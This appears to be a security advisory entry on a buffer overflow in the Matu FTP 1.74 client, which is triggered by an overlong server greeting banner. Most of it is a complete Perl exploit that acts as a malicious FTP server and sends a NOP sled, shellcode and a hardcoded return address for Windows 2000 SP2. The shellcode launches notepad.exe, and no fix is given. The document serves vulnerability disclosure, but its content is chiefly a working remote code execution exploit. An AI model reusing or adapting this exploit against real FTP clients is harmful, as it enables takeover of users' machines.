COMMAND
	Matu FTP remote root exploit
SYSTEMS AFFECTED
	Matu FTP Version 1.74
PROBLEM
	Kanatoko [http://www.jumperz.net/] found :
	The buffer overflow occurs when a long string like
	
	220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>
	
	is received by Matu FTP  in  the  beginning  of  an  FTP  session.  This
	vulnerability allows malicious FTP server to execute an  arbitrary  code
	on client hosts.
	This exploit code is invoked as an FTP server through inetd.
	
	#!/usr/local/bin/perl
	#------------------------------------------------------
	# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
	# ( run under inetd )
	# written by Kanatoko <[email protected]>
	# http://www.jumperz.net/
	#------------------------------------------------------
	$|=1;
	        #egg written by UNYUN (http://www.shadowpenguin.org/)
	$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
	$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
	$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
	$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
	$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
	$egg .= "notepad.exe";
	        #egg_address = 0x0012F43C
	$buf = "\x90" x 217;
	$buf .= $egg;
	$buf .= "A" x 2;
	$buf .= "\x3C\xF4\x12\x00";
	$buf .= "B" x 80;
	print "220 $buf\r\n";
	
SOLUTION
	None yet